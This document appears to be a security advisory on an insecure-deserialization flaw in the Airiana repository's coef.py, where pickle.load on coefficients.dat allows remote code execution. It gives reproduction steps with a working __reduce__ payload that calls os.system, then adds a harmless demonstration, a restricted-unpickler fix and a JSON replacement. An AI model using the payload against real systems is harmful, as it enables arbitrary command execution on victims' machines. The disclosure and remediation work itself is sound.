### Key Information

#### Vulnerability Description

- **Vulnerability Type**: Insecure Deserialization
- **Impact**: Remote Code Execution (RCE) via `pickle.load()`

#### Vulnerability Cause

- The script loads data from the `coefficients.dat` file using Python's `pickle.load()`.
- No validation is performed on the file content. Unpickling rebuilds objects by calling whatever callables the stream names (through `__reduce__`), so anyone who can replace the `.dat` file with a crafted payload gets arbitrary code execution with the privileges of the user running the script. The code runs inside `pickle.load()` itself, before any of the script's own logic sees the data.

#### Vulnerable Code

```python
import pickle

file = open("coefficients.dat", "rb")
a = pickle.load(file)
```

#### Reproduction Steps

1. Clone the repository: `git clone https://github.com/BeamCtrl/Airiana`
2. Navigate to the directory: `cd Airiana`
3. Create a malicious `coefficients.dat` file:

   ```python
   import os
   import pickle

   class Evil:
       # __reduce__ tells pickle how to rebuild this object: by calling
       # os.system("gnome-calculator"). The call happens during pickle.load().
       def __reduce__(self):
           return (os.system, ("gnome-calculator",))  # Replace with any system command

   payload = pickle.dumps(Evil())
   with open("coefficients.dat", "wb") as f:
       f.write(payload)
   ```

4. Run the vulnerable script: `python3 coef.py`
5. Observe the result: the calculator (or whatever command was placed in `__reduce__`) is executed. `gnome-calculator` only shows a window inside a desktop session; on a headless host, substitute a command with a verifiable side effect, such as one that writes a file.

#### Evidence

- A video recording is provided, showing the calculator being launched.
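The following is an added example, not code from the Airiana repository or from the advisory author. It reproduces the mechanism of the PoC with a harmless stand-in for `os.system` (a function `fake_system` that only records the command, an assumption made so the payload can be observed without spawning a process), then shows two fixes: a restricted `Unpickler` that refuses to resolve any global, so a `__reduce__` payload fails before its target callable is looked up, and the preferred replacement, a JSON file validated against the expected shape (assumed here to be a list of numbers; the real `coefficients.dat` format is not shown in the advisory).

```python
import io
import json
import pickle

# Constructed sample (assumption: coefficients.dat holds a list of floats).
LEGIT_COEFFICIENTS = [1.0, -0.5, 0.25]

# Stand-in for os.system: records the command instead of executing it.
EXECUTED = []


def fake_system(cmd):
    EXECUTED.append(cmd)
    return 0


class Evil:
    # Same trick as the PoC: unpickling calls fake_system("gnome-calculator").
    def __reduce__(self):
        return (fake_system, ("gnome-calculator",))


def build_malicious_payload():
    return pickle.dumps(Evil())


def build_legit_payload():
    return pickle.dumps(LEGIT_COEFFICIENTS)


def unsafe_load(data):
    # Equivalent of coef.py's pickle.load(): any callable named in the stream runs.
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    # Every class or function referenced by a pickle stream is resolved through
    # find_class. With an empty allowlist no global can be imported, so a
    # __reduce__ payload raises before the target callable exists. Plain lists,
    # dicts, numbers and strings need no globals and still load.
    ALLOWED = set()  # e.g. {("builtins", "set")} if a legitimate file needs it

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve global {module}.{name}")


def restricted_load(data):
    """Return the unpickled object, or None if the stream referenced a global."""
    try:
        return RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError:
        return None


def load_coefficients_json(text):
    """Preferred fix: a data-only format plus shape validation, no pickle at all."""
    data = json.loads(text)
    if not isinstance(data, list) or not all(
        isinstance(x, (int, float)) and not isinstance(x, bool) for x in data
    ):
        raise ValueError("coefficients must be a JSON list of numbers")
    return [float(x) for x in data]


if __name__ == "__main__":
    unsafe_load(build_malicious_payload())
    print("unsafe_load side effect:", EXECUTED)  # ['gnome-calculator']
    EXECUTED.clear()
    print("restricted_load(malicious):", restricted_load(build_malicious_payload()))  # None
    print("side effects after restricted load:", EXECUTED)  # []
    print("restricted_load(legit):", restricted_load(build_legit_payload()))
    print("json:", load_coefficients_json("[1, -0.5, 0.25]"))
```

The allowlisting unpickler is a containment measure for code that cannot move off pickle immediately; it is only as safe as its allowlist, and a single permitted class with a useful `__reduce__` or `__setstate__` reopens the problem. The JSON loader removes the attack surface entirely: a crafted file can at worst produce a `ValueError`.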